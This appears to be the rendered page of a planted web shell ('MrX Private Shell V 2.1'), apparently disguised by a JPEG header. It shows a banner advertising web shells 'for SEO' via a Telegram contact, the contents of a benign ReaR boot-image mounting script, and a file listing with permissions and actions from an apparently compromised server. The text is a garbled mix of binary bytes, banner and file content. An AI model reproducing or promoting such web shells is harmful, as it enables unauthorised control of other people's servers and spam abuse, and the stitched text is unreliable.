����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# 200_mount_bootimg.sh dd if=/dev/zero of=$TMP_DIR/boot.img count=64000 bs=1024 # Make a FAT filesystem on the boot.img file and loop mount it # cf. https://github.com/rear/rear/issues/2575 # and output/ISO/Linux-i386/700_create_efibootimg.sh # and output/RAWDISK/Linux-i386/280_create_bootable_disk_image.sh # Let mkfs.vfat automatically select the FAT type based on the size. # I.e. do not use a '-F 16' or '-F 32' option and hope for the best: mkfs.vfat $v $TMP_DIR/boot.img mkdir -p $v $TMP_DIR/mnt mount $v -o loop -t vfat $TMP_DIR/boot.img $TMP_DIR/mnt || Error "Failed to loop mount boot.img"
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 200_mount_bootimg.sh | File | 600 B | 0644 |
|
| 300_create_bootimg.sh | File | 974 B | 0644 |
|
| 400_create_local_efi_dir.sh | File | 577 B | 0644 |
|
| 700_umount_bootimg.sh | File | 88 B | 0644 |
|
| 800_create_isofs.sh | File | 1.52 KB | 0644 |
|